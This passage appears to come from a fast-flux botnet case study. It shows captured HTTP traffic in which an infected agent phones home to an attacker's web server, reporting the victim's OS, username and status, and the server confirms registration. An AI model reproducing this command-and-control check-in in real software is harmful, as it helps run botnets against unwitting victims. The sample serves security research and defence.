Fast-Flux Proxy Samples
In our fast-flux case study, this is where our infected flux agent makes an initial contact (phone home) connection to a remote web server to report to the attacker that the victim system has been successfully infected and is standing by to provide flux-net services.
GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1 User-Agent: MSIE 7.0 Host: xxx.ifeelyou.info Cache-Control: no-cache GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1 User-Agent: MSIE 7.0 Host: xxx.ifeelyou.info Cache-Control: no-cache GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1 User-Agent: MSIE 7.0 Host: xxx.ifeelyou.info Cache-Control: no-cache HTTP/1.1 200 OK Date: Tue, 03 Apr 2007 07:55:53 GMT Server: Apache/2.0.54 (Fedora) X-Powered-By: PHP/5.0.4 Content-Length: 19 Connection: close Content-Type: text/html; charset=UTF-8 Added Successfully!